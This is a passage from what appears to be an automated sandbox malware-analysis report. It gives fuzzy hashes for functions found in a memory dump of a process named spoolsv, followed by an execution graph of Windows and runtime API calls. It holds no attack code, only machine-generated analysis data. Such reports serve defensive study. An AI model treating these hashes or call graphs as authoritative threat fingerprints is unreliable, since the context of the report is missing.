                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F513351A5E6CA4FE786A7789869675BFD8EF47215B0804FBF0CDC71A3DD084846C382
                                                                                                                                                                                                                                                        Function 00007FFAAC5A0790 Relevance: .2, Instructions: 182COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2380907749.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffaac5a0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dece1403c8f30b37b5136fc9fdacd8713d113f3f9c6f76205f5442167cb02705
                                                                                                                                                                                                                                                        • Instruction ID: 0c1a27830ee42819f8b8244d879d47ceac6d49cf3bab20b99fc3b440757e2285
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dece1403c8f30b37b5136fc9fdacd8713d113f3f9c6f76205f5442167cb02705
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71513C72A5D64A8FD304E77CD8A54F93FE1EF85314B44C5BED049CB2A3DD2458098785
                                                                                                                                                                                                                                                        Function 00007FFAAC5A0650 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2380907749.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffaac5a0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a29fb7b3a3d7fe88938c4ba58fbac64ec38c3596c638b62991d526eb3ea80af3
                                                                                                                                                                                                                                                        • Instruction ID: c219f31376f6a3bb685163c958fbe63ae29c6b5d937e427e43371de569242627
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a29fb7b3a3d7fe88938c4ba58fbac64ec38c3596c638b62991d526eb3ea80af3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E318062B1C9490FE798FB2DD86A679B6C6EF99311F0445BAE04EC3293DD649C428381
                                                                                                                                                                                                                                                        Function 00007FFAAC5A0D41 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2380907749.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffaac5a0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 056ea1e81da72ed59eae828ed9c776edffae1c3af4372b972c8b1c0ea4582174
                                                                                                                                                                                                                                                        • Instruction ID: 5d53181e5d7047cfe1e5268bb5062c1b329d8d0cb3e594cb945ae08fad7260fb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 056ea1e81da72ed59eae828ed9c776edffae1c3af4372b972c8b1c0ea4582174
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC31C752B5CA4A5FF744B7BC981A7FC77D5EF99711F0482B6E00EC3292DD2898058381
                                                                                                                                                                                                                                                        Function 00007FFAAC5A0BFA Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2380907749.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffaac5a0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3ecd13009781006b0362aef921cfea99915c8785c1846f064db9296182d1909d
                                                                                                                                                                                                                                                        • Instruction ID: 82adf6662e03d4a9a64018d4ed4ef6685385ca47aaab4892f1cb5cda8f757c3d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ecd13009781006b0362aef921cfea99915c8785c1846f064db9296182d1909d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF318475A5CA0A8FEB44EB78C455AFD77E2FF98300F50857DD00AD7292DD38A8458781
                                                                                                                                                                                                                                                        Function 00007FFAAC5A0870 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2380907749.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffaac5a0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 79df6a5729f4663156b2676bf84599fc2003868386e7c416412cb7c1208c7e28
                                                                                                                                                                                                                                                        • Instruction ID: c4095f2c70b88f2c6c9961870c658ffc47dfa767e6b5a6bcf26694abcd00bbfc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79df6a5729f4663156b2676bf84599fc2003868386e7c416412cb7c1208c7e28
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D43172A169C64A4FD744EB3CD4A69B97FF1BF89300B81C4BDD00ACB3A6CD246D058796
                                                                                                                                                                                                                                                        Function 00007FFAAC5A1652 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2380907749.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffaac5a0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 75526d6cf6a2b8ea38b50808f92379895c670f5695190dfe88bbbbef2442b9f1
                                                                                                                                                                                                                                                        • Instruction ID: 69a1401050555d1f75d03f3c6cbc8cc7700d46ee54b8117e8aa243b8b99105cf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75526d6cf6a2b8ea38b50808f92379895c670f5695190dfe88bbbbef2442b9f1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F11A261E5590F8AEB44EB5CD8595FEBBF1FF49350F40827AE00EE75A6CE25180A4780
                                                                                                                                                                                                                                                        Function 00007FFAAC5A2331 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2380907749.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffaac5a0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ab561c54828f56ff6f95eff71cd2a817176ad31982f640afaa9c60d7645824d1
                                                                                                                                                                                                                                                        • Instruction ID: 40b7bfad928f0e9b786527836d4de2df6fb78a266febeaf6547e91d956de09e7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab561c54828f56ff6f95eff71cd2a817176ad31982f640afaa9c60d7645824d1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D401761498E6878FE745AB3958465727FE4DB93740F0444BBF48DCA0A3D918EA4A83D2

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:7.4%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:8.4%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:641
                                                                                                                                                                                                                                                        Total number of Limit Nodes:16
                                                                                                                                                                                                                                                        execution_graph 26137 73cfb5ec 26142 73cfb3ba 26137->26142 26140 73cfb614 26147 73cfb3e5 26142->26147 26144 73cfb5d8 26161 73cf90a7 26 API calls _abort 26144->26161 26146 73cfb537 26146->26140 26154 73d01196 26146->26154 26147->26147 26150 73cfb52e 26147->26150 26157 73d00a48 46 API calls 2 library calls 26147->26157 26149 73cfb578 26149->26150 26158 73d00a48 46 API calls 2 library calls 26149->26158 26150->26146 26160 73cf9379 20 API calls _abort 26150->26160 26152 73cfb597 26152->26150 26159 73d00a48 46 API calls 2 library calls 26152->26159 26162 73d00b6b 26154->26162 26156 73d011b1 26156->26140 26157->26149 26158->26152 26159->26150 26160->26144 26161->26146 26164 73d00b77 ___scrt_is_nonwritable_in_current_image 26162->26164 26163 73d00b85 26180 73cf9379 20 API calls _abort 26163->26180 26164->26163 26166 73d00bbe 26164->26166 26173 73d01145 26166->26173 26167 73d00b8a 26181 73cf90a7 26 API calls _abort 26167->26181 26172 73d00b94 ___scrt_is_nonwritable_in_current_image 26172->26156 26183 73cfb76f 26173->26183 26176 73d00be2 26182 73d00c0b LeaveCriticalSection __wsopen_s 26176->26182 26180->26167 26181->26172 26182->26172 26184 73cfb77b 26183->26184 26185 73cfb792 26183->26185 26256 73cf9379 20 API calls _abort 26184->26256 26186 73cfb79a 26185->26186 26187 73cfb7b1 26185->26187 26258 73cf9379 20 API calls _abort 26186->26258 26260 73cfbaad 10 API calls 2 library calls 26187->26260 26189 73cfb780 26257 73cf90a7 26 API calls _abort 26189->26257 26193 73cfb79f 26259 73cf90a7 26 API calls _abort 26193->26259 26194 73cfb7b8 MultiByteToWideChar 26196 73cfb7e7 26194->26196 26197 73cfb7d7 GetLastError 26194->26197 26262 73cf8389 21 API calls 2 library calls 26196->26262 26261 73cf9343 20 API calls __dosmaperr 26197->26261 26200 73cfb7ef 26202 73cfb817 26200->26202 26203 73cfb7f6 MultiByteToWideChar 26200->26203 26201 73cfb78b 26201->26176 26208 73d011b6 26201->26208 26264 73cf834f 20 API calls __dosmaperr 26202->26264 26203->26202 26204 73cfb80b GetLastError 26203->26204 26263 73cf9343 20 API calls __dosmaperr 26204->26263 26207 73cfb82c 26207->26201 26265 73d00f19 26208->26265 26211 73d01201 26283 73cffe02 26211->26283 26212 73d011e8 26321 73cf9366 20 API calls _abort 26212->26321 26215 73d01206 26216 73d01226 26215->26216 26217 73d0120f 26215->26217 26296 73d00e84 CreateFileW 26216->26296 26323 73cf9366 20 API calls _abort 26217->26323 26221 73d01214 26324 73cf9379 20 API calls _abort 26221->26324 26223 73d012dc GetFileType 26224 73d012e7 GetLastError 26223->26224 26229 73d0132e 26223->26229 26327 73cf9343 20 API calls __dosmaperr 26224->26327 26225 73d012b1 GetLastError 26326 73cf9343 20 API calls __dosmaperr 26225->26326 26226 73d0125f 26226->26223 26226->26225 26325 73d00e84 CreateFileW 26226->26325 26297 73cffd4b 26229->26297 26231 73d011ed 26322 73cf9379 20 API calls _abort 26231->26322 26232 73d012f5 CloseHandle 26232->26231 26235 73d0131e 26232->26235 26234 73d012a4 26234->26223 26234->26225 26328 73cf9379 20 API calls _abort 26235->26328 26238 73d0139b 26243 73d013c8 26238->26243 26329 73d00c37 72 API calls 3 library calls 26238->26329 26239 73d01323 26239->26231 26242 73d013c1 26242->26243 26244 73d013d9 26242->26244 26330 73cfaff5 29 API calls 2 library calls 26243->26330 26246 73d01183 26244->26246 26247 73d01457 CloseHandle 26244->26247 26255 73cf834f 20 API calls __dosmaperr 26246->26255 26331 73d00e84 CreateFileW 26247->26331 26249 73d01482 26250 73d0148c GetLastError 26249->26250 26254 73d013d1 26249->26254 26332 73cf9343 20 API calls __dosmaperr 26250->26332 26252 73d01498 26333 73cfff14 21 API calls 2 library calls 26252->26333 26254->26246 26255->26176 26256->26189 26257->26201 26258->26193 26259->26201 26260->26194 26261->26201 26262->26200 26263->26202 26264->26207 26266 73d00f54 26265->26266 26267 73d00f3a 26265->26267 26334 73d00ea9 26266->26334 26267->26266 26341 73cf9379 20 API calls _abort 26267->26341 26270 73d00f49 26342 73cf90a7 26 API calls _abort 26270->26342 26272 73d00f8c 26273 73d00fbb 26272->26273 26343 73cf9379 20 API calls _abort 26272->26343 26281 73d0100e 26273->26281 26345 73d022a1 26 API calls 2 library calls 26273->26345 26276 73d01009 26279 73d01088 26276->26279 26276->26281 26277 73d00fb0 26344 73cf90a7 26 API calls _abort 26277->26344 26346 73cf90b7 11 API calls _abort 26279->26346 26281->26211 26281->26212 26282 73d01094 26284 73cffe0e ___scrt_is_nonwritable_in_current_image 26283->26284 26349 73cfb937 EnterCriticalSection 26284->26349 26286 73cffe5c 26350 73cfff0b 26286->26350 26288 73cffe15 26288->26286 26289 73cffe3a 26288->26289 26293 73cffea8 EnterCriticalSection 26288->26293 26353 73cffbe1 21 API calls 3 library calls 26289->26353 26291 73cffe85 ___scrt_is_nonwritable_in_current_image 26291->26215 26292 73cffe3f 26292->26286 26354 73cffd28 EnterCriticalSection 26292->26354 26293->26286 26295 73cffeb5 LeaveCriticalSection 26293->26295 26295->26288 26296->26226 26298 73cffd5a 26297->26298 26299 73cffdc3 26297->26299 26298->26299 26304 73cffd80 __wsopen_s 26298->26304 26356 73cf9379 20 API calls _abort 26299->26356 26301 73cffdc8 26357 73cf9366 20 API calls _abort 26301->26357 26303 73cffdb0 26303->26238 26306 73d01095 26303->26306 26304->26303 26305 73cffdaa SetStdHandle 26304->26305 26305->26303 26307 73d010bb 26306->26307 26308 73d010bf 26306->26308 26307->26238 26308->26307 26358 73d0217b 26308->26358 26311 73d010e1 26428 73cf9366 20 API calls _abort 26311->26428 26312 73d010f7 26361 73d02a17 26312->26361 26315 73d010e6 26315->26307 26430 73cf9379 20 API calls _abort 26315->26430 26317 73d0111f 26317->26315 26319 73d0217b __wsopen_s 28 API calls 26317->26319 26319->26315 26321->26231 26322->26246 26323->26221 26324->26231 26325->26234 26326->26231 26327->26232 26328->26239 26329->26242 26330->26254 26331->26249 26332->26252 26333->26254 26335 73d00ec1 26334->26335 26338 73d00edc 26335->26338 26347 73cf9379 20 API calls _abort 26335->26347 26337 73d00f00 26348 73cf90a7 26 API calls _abort 26337->26348 26338->26272 26340 73d00f0b 26340->26272 26341->26270 26342->26266 26343->26277 26344->26273 26345->26276 26346->26282 26347->26337 26348->26340 26349->26288 26355 73cfb97f LeaveCriticalSection 26350->26355 26352 73cfff12 26352->26291 26353->26292 26354->26286 26355->26352 26356->26301 26357->26303 26431 73d020e2 26358->26431 26362 73d02a41 26361->26362 26363 73d02a29 26361->26363 26365 73d02dab 26362->26365 26370 73d02a86 26362->26370 26469 73cf9366 20 API calls _abort 26363->26469 26487 73cf9366 20 API calls _abort 26365->26487 26366 73d02a2e 26470 73cf9379 20 API calls _abort 26366->26470 26369 73d02db0 26488 73cf9379 20 API calls _abort 26369->26488 26371 73d01109 26370->26371 26373 73d02a91 26370->26373 26377 73d02ac1 26370->26377 26371->26317 26429 73d0239e 62 API calls 4 library calls 26371->26429 26471 73cf9366 20 API calls _abort 26373->26471 26374 73d02a9e 26489 73cf90a7 26 API calls _abort 26374->26489 26376 73d02a96 26472 73cf9379 20 API calls _abort 26376->26472 26380 73d02ada 26377->26380 26382 73d02b00 26377->26382 26383 73d02b1c 26377->26383 26381 73d02ae7 26380->26381 26380->26382 26460 73cff7e7 26381->26460 26473 73cf9366 20 API calls _abort 26382->26473 26476 73cf8389 21 API calls 2 library calls 26383->26476 26387 73d02b05 26474 73cf9379 20 API calls _abort 26387->26474 26388 73d02b33 26477 73cf834f 20 API calls __dosmaperr 26388->26477 26392 73d02c85 26395 73d02cfb 26392->26395 26399 73d02c9e GetConsoleMode 26392->26399 26393 73d02b0c 26475 73cf90a7 26 API calls _abort 26393->26475 26394 73d02b3c 26478 73cf834f 20 API calls __dosmaperr 26394->26478 26398 73d02cff ReadFile 26395->26398 26401 73d02d73 GetLastError 26398->26401 26402 73d02d19 26398->26402 26399->26395 26403 73d02caf 26399->26403 26400 73d02b43 26405 73d02b68 26400->26405 26406 73d02b4d 26400->26406 26407 73d02d80 26401->26407 26408 73d02cd7 26401->26408 26402->26401 26409 73d02cf0 26402->26409 26403->26398 26404 73d02cb5 ReadConsoleW 26403->26404 26404->26409 26410 73d02cd1 GetLastError 26404->26410 26414 73d0217b __wsopen_s 28 API calls 26405->26414 26479 73cf9379 20 API calls _abort 26406->26479 26485 73cf9379 20 API calls _abort 26407->26485 26425 73d02b17 __wsopen_s 26408->26425 26481 73cf9343 20 API calls __dosmaperr 26408->26481 26419 73d02d55 26409->26419 26420 73d02d3e 26409->26420 26409->26425 26410->26408 26418 73d02b75 26414->26418 26416 73d02b52 26480 73cf9366 20 API calls _abort 26416->26480 26417 73d02d85 26486 73cf9366 20 API calls _abort 26417->26486 26418->26381 26424 73d02d6c 26419->26424 26419->26425 26483 73d02846 31 API calls 2 library calls 26420->26483 26484 73d02686 29 API calls __wsopen_s 26424->26484 26482 73cf834f 20 API calls __dosmaperr 26425->26482 26427 73d02b5d 26427->26425 26428->26315 26429->26317 26430->26307 26440 73cfffa5 26431->26440 26433 73d020f4 26434 73d020fc 26433->26434 26435 73d0210d SetFilePointerEx 26433->26435 26453 73cf9379 20 API calls _abort 26434->26453 26437 73d010d1 26435->26437 26438 73d02125 GetLastError 26435->26438 26437->26311 26437->26312 26454 73cf9343 20 API calls __dosmaperr 26438->26454 26441 73cfffc7 26440->26441 26442 73cfffb2 26440->26442 26446 73cfffec 26441->26446 26457 73cf9366 20 API calls _abort 26441->26457 26455 73cf9366 20 API calls _abort 26442->26455 26445 73cfffb7 26456 73cf9379 20 API calls _abort 26445->26456 26446->26433 26447 73cffff7 26458 73cf9379 20 API calls _abort 26447->26458 26450 73cfffbf 26450->26433 26451 73cfffff 26459 73cf90a7 26 API calls _abort 26451->26459 26453->26437 26454->26437 26455->26445 26456->26450 26457->26447 26458->26451 26459->26450 26461 73cff7f4 26460->26461 26462 73cff801 26460->26462 26490 73cf9379 20 API calls _abort 26461->26490 26464 73cff80d 26462->26464 26491 73cf9379 20 API calls _abort 26462->26491 26464->26392 26466 73cff7f9 26466->26392 26467 73cff82e 26492 73cf90a7 26 API calls _abort 26467->26492 26469->26366 26470->26371 26471->26376 26472->26374 26473->26387 26474->26393 26475->26425 26476->26388 26477->26394 26478->26400 26479->26416 26480->26427 26481->26425 26482->26371 26483->26425 26484->26427 26485->26417 26486->26425 26487->26369 26488->26374 26489->26371 26490->26466 26491->26467 26492->26466 26493 73cf1ceb 26494 73cf1cf9 dllmain_dispatch 26493->26494 26495 73cf1cf4 26493->26495 26497 73cf203e GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 26495->26497 26497->26494 26498 73cff36b 26513 73cfa9e3 26498->26513 26500 73cff379 26501 73cff387 26500->26501 26502 73cff3a6 26500->26502 26531 73cf9379 20 API calls _abort 26501->26531 26504 73cff3b3 26502->26504 26509 73cff3c0 __vfwprintf_l 26502->26509 26532 73cf9379 20 API calls _abort 26504->26532 26506 73cff450 26520 73cff591 26506->26520 26508 73cff38c 26509->26506 26509->26508 26510 73cff7e7 __wsopen_s 26 API calls 26509->26510 26511 73cff443 26509->26511 26510->26511 26511->26506 26533 73d02196 21 API calls 2 library calls 26511->26533 26514 73cfa9ef 26513->26514 26515 73cfaa04 26513->26515 26534 73cf9379 20 API calls _abort 26514->26534 26515->26500 26517 73cfa9f4 26535 73cf90a7 26 API calls _abort 26517->26535 26519 73cfa9ff 26519->26500 26521 73cfa9e3 __vfwprintf_l 26 API calls 26520->26521 26522 73cff5a0 26521->26522 26523 73cff644 26522->26523 26524 73cff5b2 26522->26524 26525 73d006ce __wsopen_s 62 API calls 26523->26525 26526 73cff5cf 26524->26526 26529 73cff5f5 26524->26529 26528 73cff5dc 26525->26528 26539 73d006ce 26526->26539 26528->26508 26529->26528 26536 73d02160 26529->26536 26531->26508 26532->26508 26533->26506 26534->26517 26535->26519 26564 73d01fdd 26536->26564 26538 73d02176 26538->26528 26540 73d006da ___scrt_is_nonwritable_in_current_image 26539->26540 26541 73d006e2 26540->26541 26542 73d006fa 26540->26542 26652 73cf9366 20 API calls _abort 26541->26652 26544 73d00798 26542->26544 26548 73d0072f 26542->26548 26657 73cf9366 20 API calls _abort 26544->26657 26545 73d006e7 26653 73cf9379 20 API calls _abort 26545->26653 26598 73cffd28 EnterCriticalSection 26548->26598 26549 73d0079d 26658 73cf9379 20 API calls _abort 26549->26658 26552 73d00735 26554 73d00751 26552->26554 26555 73d00766 26552->26555 26553 73d007a5 26659 73cf90a7 26 API calls _abort 26553->26659 26654 73cf9379 20 API calls _abort 26554->26654 26599 73d007b9 26555->26599 26558 73d006ef ___scrt_is_nonwritable_in_current_image 26558->26528 26560 73d00756 26655 73cf9366 20 API calls _abort 26560->26655 26561 73d00761 26656 73d00790 LeaveCriticalSection __wsopen_s 26561->26656 26565 73d01fe9 ___scrt_is_nonwritable_in_current_image 26564->26565 26566 73d01ff1 26565->26566 26567 73d02009 26565->26567 26590 73cf9366 20 API calls _abort 26566->26590 26568 73d020bd 26567->26568 26572 73d02041 26567->26572 26595 73cf9366 20 API calls _abort 26568->26595 26571 73d01ff6 26591 73cf9379 20 API calls _abort 26571->26591 26589 73cffd28 EnterCriticalSection 26572->26589 26573 73d020c2 26596 73cf9379 20 API calls _abort 26573->26596 26577 73d01ffe ___scrt_is_nonwritable_in_current_image 26577->26538 26578 73d02047 26580 73d02080 26578->26580 26581 73d0206b 26578->26581 26579 73d020ca 26597 73cf90a7 26 API calls _abort 26579->26597 26584 73d020e2 __wsopen_s 28 API calls 26580->26584 26592 73cf9379 20 API calls _abort 26581->26592 26586 73d0207b 26584->26586 26585 73d02070 26593 73cf9366 20 API calls _abort 26585->26593 26594 73d020b5 LeaveCriticalSection __wsopen_s 26586->26594 26589->26578 26590->26571 26591->26577 26592->26585 26593->26586 26594->26577 26595->26573 26596->26579 26597->26577 26598->26552 26600 73d007e7 26599->26600 26636 73d007e0 26599->26636 26601 73d0080a 26600->26601 26602 73d007eb 26600->26602 26606 73d0085b 26601->26606 26607 73d0083e 26601->26607 26674 73cf9366 20 API calls _abort 26602->26674 26605 73d007f0 26675 73cf9379 20 API calls _abort 26605->26675 26610 73d00871 26606->26610 26613 73d0217b __wsopen_s 28 API calls 26606->26613 26677 73cf9366 20 API calls _abort 26607->26677 26608 73d009c1 26608->26561 26660 73d0035e 26610->26660 26612 73d007f7 26676 73cf90a7 26 API calls _abort 26612->26676 26613->26610 26615 73d00843 26678 73cf9379 20 API calls _abort 26615->26678 26619 73d0084b 26679 73cf90a7 26 API calls _abort 26619->26679 26620 73d008b8 26623 73d00912 WriteFile 26620->26623 26624 73d008cc 26620->26624 26621 73d0087f 26625 73d00883 26621->26625 26626 73d008a5 26621->26626 26627 73d00935 GetLastError 26623->26627 26644 73d008f0 26623->26644 26629 73d00902 26624->26629 26630 73d008d4 26624->26630 26631 73d00979 26625->26631 26680 73d002f1 GetLastError WriteConsoleW CreateFileW __wsopen_s 26625->26680 26681 73d0013e 45 API calls 3 library calls 26626->26681 26627->26644 26667 73d003d4 26629->26667 26632 73d008f2 26630->26632 26633 73d008d9 26630->26633 26631->26636 26687 73cf9379 20 API calls _abort 26631->26687 26683 73d005a1 8 API calls 2 library calls 26632->26683 26633->26631 26639 73d008e2 26633->26639 26689 73cf24a6 5 API calls ___raise_securityfailure 26636->26689 26638 73d0089b 26638->26631 26638->26636 26642 73d00955 26638->26642 26682 73d004b3 7 API calls 2 library calls 26639->26682 26641 73d0099e 26688 73cf9366 20 API calls _abort 26641->26688 26646 73d00970 26642->26646 26647 73d0095c 26642->26647 26644->26638 26686 73cf9343 20 API calls __dosmaperr 26646->26686 26684 73cf9379 20 API calls _abort 26647->26684 26650 73d00961 26685 73cf9366 20 API calls _abort 26650->26685 26652->26545 26653->26558 26654->26560 26655->26561 26656->26558 26657->26549 26658->26553 26659->26558 26661 73cff7e7 __wsopen_s 26 API calls 26660->26661 26662 73d0036e 26661->26662 26663 73d00373 26662->26663 26690 73cf9ccd 38 API calls 2 library calls 26662->26690 26663->26620 26663->26621 26665 73d00396 26665->26663 26666 73d003b4 GetConsoleMode 26665->26666 26666->26663 26671 73d003e3 __wsopen_s 26667->26671 26668 73d00496 26691 73cf24a6 5 API calls ___raise_securityfailure 26668->26691 26669 73d00455 WriteFile 26669->26671 26672 73d00498 GetLastError 26669->26672 26671->26668 26671->26669 26672->26668 26673 73d004af 26673->26638 26674->26605 26675->26612 26676->26636 26677->26615 26678->26619 26679->26636 26680->26638 26681->26638 26682->26644 26683->26644 26684->26650 26685->26636 26686->26636 26687->26641 26688->26636 26689->26608 26690->26665 26691->26673 26692 1604668 26693 1604684 26692->26693 26694 1604696 26693->26694 26696 16047a0 26693->26696 26697 16047c5 26696->26697 26701 16048b0 26697->26701 26705 16048a1 26697->26705 26703 16048d7 26701->26703 26702 16049b4 26702->26702 26703->26702 26709 1604248 26703->26709 26707 16048b0 26705->26707 26706 16049b4 26706->26706 26707->26706 26708 1604248 CreateActCtxA 26707->26708 26708->26706 26710 1605940 CreateActCtxA 26709->26710 26712 1605a03 26710->26712 26939 160ad38 26943 160ae20 26939->26943 26953 160ae30 26939->26953 26940 160ad47 26944 160ae30 26943->26944 26947 160ae64 26944->26947 26963 1609838 26944->26963 26947->26940 26948 160ae5c 26948->26947 26949 160b068 GetModuleHandleW 26948->26949 26950 160b095 26949->26950 26950->26940 26954 160ae41 26953->26954 26958 160ae64 26953->26958 26955 1609838 GetModuleHandleW 26954->26955 26956 160ae4c 26955->26956 26956->26958 26961 160b0c8 GetModuleHandleW 26956->26961 26962 160b0b8 GetModuleHandleW 26956->26962 26957 160ae5c 26957->26958 26959 160b068 GetModuleHandleW 26957->26959 26958->26940 26960 160b095 26959->26960 26960->26940 26961->26957 26962->26957 26964 160b020 GetModuleHandleW 26963->26964 26966 160ae4c 26964->26966 26966->26947 26967 160b0b8 26966->26967 26971 160b0c8 26966->26971 26968 160b0c8 26967->26968 26969 1609838 GetModuleHandleW 26968->26969 26970 160b0dc 26969->26970 26970->26948 26972 1609838 GetModuleHandleW 26971->26972 26973 160b0dc 26972->26973 26973->26948 26974 160d0b8 26975 160d0fe 26974->26975 26979 160d298 26975->26979 26982 160d289 26975->26982 26976 160d1eb 26986 160c9a0 26979->26986 26983 160d298 26982->26983 26984 160c9a0 DuplicateHandle 26983->26984 26985 160d2c6 26984->26985 26985->26976 26987 160d300 DuplicateHandle 26986->26987 26988 160d2c6 26987->26988 26988->26976 26713 73cf1bc5 26715 73cf1bd1 ___scrt_is_nonwritable_in_current_image 26713->26715 26714 73cf1bfa dllmain_raw 26716 73cf1c14 dllmain_crt_dispatch 26714->26716 26718 73cf1be0 ___scrt_is_nonwritable_in_current_image 26714->26718 26715->26714 26717 73cf1bf5 26715->26717 26715->26718 26716->26717 26716->26718 26726 73cf17a0 26717->26726 26721 73cf1c61 26721->26718 26722 73cf1c6a dllmain_crt_dispatch 26721->26722 26722->26718 26724 73cf1c7d dllmain_raw 26722->26724 26723 73cf17a0 81 API calls 26725 73cf1c4d dllmain_crt_dispatch dllmain_raw 26723->26725 26724->26718 26725->26721 26727 73cf17b4 26726->26727 26728 73cf17b2 26726->26728 26742 73cf10e0 26727->26742 26731 73cf10e0 29 API calls 26728->26731 26732 73cf1814 26731->26732 26734 73cf182b 26732->26734 26737 73cf1930 _fwprintf 76 API calls 26732->26737 26733 73cf17d0 26736 73cf17e5 DisableThreadLibraryCalls 26733->26736 26748 73cf7299 26733->26748 26738 73cf183d 26734->26738 26740 73cf7299 67 API calls 26734->26740 26736->26738 26737->26734 26738->26721 26738->26723 26740->26738 26741 73cf17e2 26741->26736 26761 73cf73da 26742->26761 26745 73cf1930 26819 73cf1860 26745->26819 26749 73cf72a5 ___scrt_is_nonwritable_in_current_image 26748->26749 26750 73cf72cb 26749->26750 26751 73cf72b6 26749->26751 26760 73cf72c6 ___scrt_is_nonwritable_in_current_image 26750->26760 26901 73cfab2d EnterCriticalSection 26750->26901 26918 73cf9379 20 API calls 